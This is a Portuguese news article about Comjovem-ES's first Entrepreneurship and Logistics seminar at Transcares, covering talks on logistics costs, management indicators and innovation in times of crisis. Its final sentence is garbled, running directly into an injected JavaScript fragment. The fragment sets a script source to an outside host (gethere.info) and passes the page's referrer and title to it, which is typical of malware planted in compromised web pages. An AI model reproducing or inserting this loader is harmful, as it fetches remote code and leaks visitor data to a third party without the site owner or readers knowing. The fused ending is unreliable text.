Empreendedorismo e logística em foco

Esse foi o tema do primeiro seminário realizado pela Comjovem-ES, no Transcares

 

Na terça-feira, 15 de setembro, o grupo da Comjovem-ES (Comissão de Jovens Empresários e Executivos do Transporte de Cargas) reuniu dirigentes do segmento, profissionais de empresas capixabas e convidados para o 1º Seminário de Empreendedorismo e Logística, que reuniu cerca de 50 pessoas no auditório do Transcares, em Jardim América, Cariacica.

Além do presidente do Transcares, Liemar Pretti, e da diretora do sindicato para Assuntos da Comjovem-ES, Roberta Stelzer Fiorot, também estavam lá o coordenador regional da comissão, André Stelzer Fiorot, e seus subcoordenadores, Edes Speridon Júnior e Flávia D´Avila.

Pretti abriu oficialmente o seminário falando da importância do evento. “Estamos diante de um momento especial, que é a realização deste primeiro seminário cuja organização foi toda de nossos jovens. Faço questão de dar todo apoio à Comjovem porque quem integra esse grupo são os profissionais que garantirão a continuidade de nosso negócio. E eles têm muito a contribuir”, destacou.

André Fiorot complementou as palavras do presidente ao ressaltar a necessidade do grupo entrar nas discussões mais estratégicas do segmento para que estejam aptos a perenizar os negócios de suas respectivas famílias. “Juntos, aqui na Comjovem aprendemos mais, trocamos experiências e nos preparamos para o futuro”, resumiu, antes de agradecer ao trabalho e parceria de Roberta, Edes e Flávia para a concretização do seminário.

A primeira palestra da tarde, Logística e Transporte, foi apresentada pelo Gerente de Operações da Tangará Foods, Mario Mello, que falou sobre os principais desafios de quem trabalha no setor hoje em dia.

“Diria que os desafios são enormes e o maior é conseguir buscar um equilíbrio entre custos da operação e manutenção do serviço de qualidade. O que vemos, hoje, são alguns empresários desejando manter o nível de serviço, mas reticentes em remunerar como deveriam serviços de frete e taxa de coleta, dentre outros. Para que essa conta feche, portanto, é necessário um esforço para que eles busquem dentro de sua planilha de custos aquilo que é necessário e que pode ser eliminado”, ressaltou, completando em seguida.

“E no meio disso tudo ainda tem o consumidor, mais exigente do que nunca. Então, a melhor saída para os envolvidos na cadeia logística é ampliar o diálogo, buscar soluções que minimizem impactos financeiros de ambas as partes para atender ao consumidor final”.

A seguir, o Executivo de Atendimento e Relacionamento da TOTVS-ES – uma das mantenedoras do Transcares –, Rodrigo Meynard apresentou a palestra Cultura Baseada em Gestão de Indicadores, em que abordou como os sistemas de gestão aplicados permitem às empresas alcançar resultados a partir de diretrizes e metas.

“Sem controle não há gerência. No entanto, apesar de acreditarmos fielmente em tecnologia, sabemos que sem atendimento e relacionamento não se vai a lugar algum, até porque para operar nossos sistemas precisamos de pessoas”, argumentou.

A última apresentação da tarde, Inovação em Tempos de Crise, ministrada por Maria Helena Magalhães, deu um “banho” de otimismo nos presentes. Consultora da Rhopen – Soluções com Pessoas, ela promoveu – em suas próprias palavras – “um convite à reflexão” e mostrou que o mundo em que vivemos nos “apresentou” a novos problemas e novas soluções. E que para enfrentá-los cada um de nós precisou mudar, inovar, se reinventar.

“Mudar não é uma opção, é praticamente uma regra inerente da vida. A única coisa que podemos fazer é influenciar os rumos dessa mudança”, ressaltou, lançando mão de uma dica importante para o período de crise. “Vai sobreviver quem conseguir inovar. E inovar significa pensar fora do padrão definido pelo setor e pelo mercado”, disse ela, cuja empresa acaba de firmar uma parceria com o Transcares para que as empresas associadas tenham acesso aos serviços da Rhopen com desconto.

Ao longo do evento, foram sorteados três brindes: duas bolsas térmicas da TOTVS e uma coletânea de livros sobre o TRC.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;